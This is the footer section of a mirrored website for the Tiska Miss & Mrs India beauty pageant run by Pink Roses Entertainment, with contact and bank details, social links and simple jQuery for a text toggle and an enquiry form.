                                <div class="col-lg-12 col-md-12" style="clear: both;">
                                    <div class="banner-txt text-center white" style="padding-top:10px">
                                        <h2 class="bn-hd"><span>Tiska Miss & Mrs India</span></h2>
                                        <h1 class="ben-head">season <span class="black">2020</span></h1>
                                    </div>
                                </div>
                            </div>
                            <div class="modal-footer">
                                <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
                            </div>
                        </div>

                    </div>
                </div>

            </div>
        </div>

        <!--Main Footer-->

        <!--Main Footer-->
        
        <?php include './whatsapp.php'; ?>
        <footer id="custom-footer">
            <div class="custom-footer-container">
                <div class="custom-footer-grid">
                    <!-- About Section -->
                    <div class="custom-footer-col">
                        <img src="assets/images/logoO/pinkNW.png" alt="Tiska Logo" class="footer-logo">
                        <h4>About</h4>
                        <p>Pink Roses Entertainment LLp is a premier event and production company specializing in crafting glamorous, talent-centric experiences across India. We bring creativity, excellence, and elegance to every event we produce.</p>
                    </div>

                    <!-- Quick Links -->
                    <div class="custom-footer-col">
                        <h4>Quick Links</h4>
                        <ul>
                            <li><i class="fa fa-angle-right"></i><a href="index.html">Home</a></li>
                            <li><i class="fa fa-angle-right"></i><a href="nwcontact.html">Contact Us</a></li>
                            <li><i class="fa fa-angle-right"></i><a href="faq.html">FAQ</a></li>
                            <li><i class="fa fa-angle-right"></i><a data-toggle="modal"
                                    data-target="#myModal">Registrations</a></li>
                            <li><i class="fa fa-angle-right"></i><a href="team.html">Team</a></li>
                            <li><i class="fa fa-angle-right"></i><a href="policy.html">Privacy Policy</a></li>
                            <li><i class="fa fa-angle-right"></i><a href="terms.html">Terms & Conditions</a></li>
                        </ul>
                        <div class="social-icons">
                            <a href="https://www.facebook.com/tiskamissmrsmrindia/" target="_blank"><i
                                    class="fa fa-facebook"></i></a>
                            <a href="mailto:info@missindiamillion.com" target="_blank"><i
                                    class="fa fa-envelope"></i></a>
                            <a href="https://www.instagram.com/hinakauser10?igsh=d2dibHF3cW9qZjEw" target="_blank"><i
                                    class="fa fa-instagram"></i></a>
                            <a href="https://youtube.com/@pinkrosesentertainment6862?si=5WzrQqWcB2k6rxuw"><i
                                    class="fa fa-youtube"></i></a>
                        </div>
                    </div>

                    <!-- Contact -->
                    <div class="custom-footer-col">
                        <h4>Contact Us</h4>
                        <ul>
                            <li><i class="fa fa-envelope"></i> <a
                                    href="mailto:info@tiskaexpo.com">info@pinkrosesentertainment.com</a></li>
                            <li><i class="fa fa-phone"></i> <a href="tel:+9163329786">+91-9163329786</a></li>
                            <li><i class="fa fa-phone"></i> <a href="tel:+91-9818043775">+91-9818043775</a></li>
                            <!-- <li><i class="fa fa-mobile"></i> <a href="tel:+919599432256"></a></li> -->
                            <li><i class="fa fa-map-marker"></i> Birati, Kolkata 700058 </li>
                        </ul>
                    </div>

                    <!-- Bank Details -->
                    <div class="custom-footer-col">
                        <h4>Bank Details</h4>
                        <ul>
                            <li><i class="fa fa-university"></i> <strong>Account: </strong>Pink Roses Entertainment</li>
                            <li><i class="fa fa-bank"></i> <strong>Bank:</strong> IDFC Bank</li>
                            <li><i class="fa fa-credit-card"></i> <strong>A/C No:</strong> 913010039343934 </li>
                            <li><i class="fa fa-file-text"></i> <strong>Type:</strong> Current Account</li>
                            <li><i class="fa fa-university"></i>
                                <strong>IFSC:</strong> UTIB0000775
                            </li>
                            <li><i class="fa fa-university"></i> <strong>Branch:</strong> Salt Lake, Kolkata </li>
                            <li><i class="fa fa-mobile"></i> <strong>UPI:</strong> 7991489999</li>
                        </ul>
                    </div>
                </div>

                <!-- Footer Bottom -->
                <div class="custom-footer-bottom">
                    <p>&copy; 2025 pinkrosesentertainment.com | Designed by <a href="https://alwaysdial.com/">Always
                            Dial</a></p>
                </div>
            </div>
        </footer>
        <!--End Main Footer-->
        <!--End Main Footer-->

        </div>
        <!--side-panel-sec end-->

        <!--Scroll to top-->
        <div class="scroll-to-top scroll-to-target" data-target=".main-header"><span
                class="icon fa fa-long-arrow-up"></span></div>

        <script src="assets/js/jquery.min.html"></script>
        <script src="assets/js/bootstrap.min.html"></script>
        <script src="assets/js/html5lightbox.html"></script>
        <script src="assets/js/lib/slick/slick.html"></script>
        <script src="assets/js/wow.min.html"></script>
        <script src="assets/js/scrollIt.min.html"></script>
        <script src="assets/js/scripts.html"></script>
        <script>
            function myFunction() {
                var dots = document.getElementById("dots");
                var moreText = document.getElementById("more");
                var btnText = document.getElementById("myBtn");

                if (dots.style.display === "none") {
                    dots.style.display = "inline";
                    btnText.innerHTML = "Read more";
                    moreText.style.display = "none";
                } else {
                    dots.style.display = "none";
                    btnText.innerHTML = "Read less";
                    moreText.style.display = "inline";
                }
            }
            $("#indexForm").submit(function() {
                $("#preloader").css("display", "block");
                $.post("single-enquiry-form.html", $(this).serialize(), function(html) {
                    $("input[type='text']").val("");
                    $("input[type='email']").val("");
                    $("#preloader").css("display", "none");
                    alert(html);

                    return false;
                });
                return false;
            });

            $(document).ready(function() {
                $('#popupModal').modal('show');
            });
        </script>

    </body>


    <!-- Mirrored from www.tiskapageants.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Jun 2025 08:25:21 GMT -->

    </html>

NineSec Team - 2022